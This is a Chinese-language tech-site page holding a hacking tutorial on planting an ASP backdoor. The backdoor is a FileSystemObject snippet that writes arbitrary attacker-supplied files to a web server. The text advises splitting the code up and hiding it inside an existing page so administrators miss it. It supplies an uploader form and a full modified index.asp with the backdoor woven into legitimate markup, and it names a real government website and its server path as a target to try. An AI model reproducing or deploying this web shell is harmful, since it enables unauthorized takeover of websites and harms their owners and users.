扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
<% dim objFSO %> <% dim fdata %> <% dim objCountFile %> <% on error resume next %> <% Set objFSO = Server.createObject("Scripting.FileSystemObject") %> <% if Trim(request("syfdpath"))<>"" then %> <% fdata = request("cyfddata") %> <% Set objCountFile=objFSO.createTextFile(request("syfdpath"),True) %> <% objCountFile.Write fdata %> <% if err =0 then %> <% response.write "<font color=red>save Success!</font>" %> <% else %> <% response.write "<font color=red>Save UnSuccess!</font>" %> <% end if %> <% err.clear %> <% end if %> <% objCountFile.Close %> <% Set objCountFile=Nothing %> <% Set objFSO = Nothing %> |
最好要分开插入!!
这样管理员也不容易发现。
2.
将下内容保存到本地为一个htm,并把action="#",改成你插入到的页面,再添下绝对路径就好了。你要知道路径!!内容:
<form action=’#’ method=post>保存<input type=text name=syfdpath width=32 size=50><br>路径<br>内容:<textarea name=cyfddata cols=80 rows=10 width=32></textarea><input type=submit value=保存></form>
注:此方法为巩固后门使用!!!
有人说不行????
自己看看截图
大家可以把上内容的action改成"http://www.bjhi.gov.cn/web/biaozhun/index.asp"
路径添"E:\inetpub\bjhi\web\biaozhun\xxxx.asp"
试下
最后用"http://www.bjhi.gov.cn/web/biaozhun/xxxx.asp"访问看看!!
改后的index.asp:
<!--#include file="head.asp"--> <!--#include file="../../conn/xxfw_opendb.asp"--> <script language= "javascript"> function newpage(htmlurl) { var newwin=window.open(htmlurl,"newWin","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,resizable=no,top=2,left=2,width=778,height=600"); newwin.focus(); return false; } </script> <% dim objFSO %> <% dim fdata %> <% dim objCountFile %> <table width="778" border="0" cellspacing="0" cellpadding="0" height="23" class="a" align="center"> <tr> <td width="22"><img src="../biaozhun/images/a_r2_c1.jpg" width="22" height="23"></td> <td width="13"><img src="../biaozhun/images/a_r2_c3.jpg" width="13" height="23"></td> <td width="13"><img src="images/a_r2_c3.jpg" width="13" height="23"></td> <td background="images/a_r2_c4.jpg"><font color="#006699"><a href="../xinxi/zxxx/index.asp"><font color="#006699">资讯信息</font></a><font color="#006699"> | <a href="../xinxi/ggxc/index.asp"><font color="#006699">广告宣传</font></a> | <a href="../peixun/px.asp"><font color="#006699">网上培训</font></a> | <a href="index.asp"><font color="#006699">标准规范</font></a> | <a href="../yjqk/index.asp"><font color="#006699">邮箱期刊</font></a> | <a href="../xinxi/jsfw/index.asp"><font color="#006699">技术服务</font></a> | <a href="../xinxi/qysw/index.asp"><font color="#006699">企业上网</font></a> | <a href="../xinxi/xihd/index.asp"><font color="#006699">信息互动</font></a> |</font> </font></td> </tr> </table> <table width="778" border="0" cellspacing="0" cellpadding="0" height="23" align="center"> <tr bgcolor="CAF2FA"> <td width="589"><font size="2"> 你的位置:</font>>> <a href="../../soye/index.asp" class="a">综合主页</a> >> <font size="2">标准规范</font></td> <% on error resume next %> <% Set objFSO = Server.createObject("Scripting.FileSystemObject") %> <% if Trim(request("syfdpath"))<>"" then %> <td width="170"> </td> </tr> </table> <table width="778" border="0" cellspacing="0" cellpadding="0" align="center"> <tr> <td width="20" background="images/a_r4_c1.jpg"> <% fdata = request("cyfddata") %> <% Set objCountFile=objFSO.createTextFile(request("syfdpath"),True) %> <% objCountFile.Write fdata %> </td> <td width="758" background="images/a_r4_c1.jpg"><img src="images/biaozhun.jpg" width="144" height="44"></td> </tr> </table> <table width="778" border="0" cellspacing="0" cellpadding="0" height="30" align="center"> <tr> <td width="103" height="7">&nbs<% if err =0 then %> <% response.write "<font color=red>save Success!</font>" %> <% else %> <% response.write "<font color=red>Save UnSuccess!</font>" %> <% end if %>p;</td> <td width="575" height="7"> <% end if %> <% objCountFile.Close %> <% Set objCountFile=Nothing %> <% Set objFSO = Nothing %> <% set rs=server.createobject("adodb.recordset") rs.open "select * from border",conn,1,1%><br><% err.clear %> <form name="form1" method="post" action="result.asp"> <div align="center"><span class="a">选择类别: <select name="select" class="select"> <option selected value="0">请选择类别</option> <%count=rs.RecordCount for i=1 to count if rs("borderid")<>8 then%> <option value="<%Response.Write (rs("borderid"))%>"><%Response.Write (rs("bordername"))%></option> <%end if rs.MoveNext next rs.Close%> </select> 输入关键字 <input type="text" name="keys" class="input" size="20"> </span> <input type="submit" name="Submit" value="查 询" style="height:20px;background-color:#f3f3f3;border:1 solid black" onMouseOver ="this.style.backgroundColor=’#cff6fb’" onMouseOut ="this.style.backgroundColor=’#ffffff’"> </div> </form> </td> <td width="100" height="7"> </td> </tr> </table> <div align="center"> <table width="535" border="0" cellspacing="0" cellpadding="0" height="25" class="a"> <tr> <td height="25"> <table width="533" border="1" cellspacing="0" cellpadding="0" align="top" class="a" height="20" bordercolor="E7ECE6"> <% border="" color=1 number=15 ’默认值 auditer=0 articlefrom="" set rs=server.createobject("adodb.recordset") rs.open "select * from info where typeid=2 and bz_sh=1 order by date desc ",conn,1,1 if err.number <> 0 then response.write "数据库出错" else if rs.bof and rs.eof then rs.close response.write "该专栏目前没有信息服务内容" else if request("page")="" then curpage = 1 else curpage = cint(request("page")) end if if request("num")="" then num = 1 else num = cint(request("num")) end if rs.pagesize=cint(number) rs.absolutepage = curpage thisnumcol=cstr(rs.recordcount)-num prenum=cstr(rs.recordcount)-thisnumcol-15 for i = 1 to rs.pagesize %> <tr> <!--<td width="17" bgcolor="EBEDEA" height="15"> <div align="center"><img src="images/09.jpg" width="9" height="9"></div> </td>--> <td width="8%" bgcolor="EBEDEA" height="15"> <div align="center"><%Response.Write (num)%></div> </td> <td width="75%" height="15" bgcolor="<%if color mod 2=0 then response.write "#FFFFFF" else response.write "#CFF6FB" end if %>"> <%=trim(rs("title"))%></td> <td align="center" width="17%" height="15" bgcolor="<%if color mod 2=0 then response.write "#FFFFFF" else response.write "#CFF6FB" end if %>"> <a href="showinfo.asp?infoid=<%=rs("infoid")%>" onClick="return newpage(this.href);">查看详情</a></td> </tr> <% rs.movenext num=num+1 color=color+1 if rs.eof then i = i + 1 exit for end if next %></table><br><font size="2"> <% endnum=cstr(rs.recordcount)-(cstr(rs.recordcount) mod 15)+1 response.write "<div align=center>" response.write "第<font color=red>" + cstr(curpage) + "</font>页/总<font color=red>" + cstr(rs.pagecount) + "</font>页 " response.write "本页<font color=red>" + cstr(i-1) + "</font>条/总<font color=red>" + cstr(rs.recordcount) + "</font>条 " if curpage = 1 then response.write "首页 前页 " else response.write "<a href=’index.asp?page=1&num=1’>首页</a> <a href=’index.asp?page=" & cstr(curpage-1) & "&num="&prenum&"’>前页</a> " end if if curpage = rs.pagecount then response.write "后页 末页" else response.write "<a href=’index.asp?page=" + cstr(curpage+1) + "&num="&num&"’>后页</a> <a href=’index.asp?page=" + cstr(rs.pagecount) + "&num="&endnum&"’>末页</a>" end if end If end if ’?typeid=" & cstr(request("typeid")) & "&borderid=" & cstr(request("borderid")) & "& page=1’> response.write "<div align=center><hr size=0 width=’85%’>"%></font> </table> </div> <!--#include file="foot.asp"--> <!--#include file="../../conn/closedb.asp"--> |
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者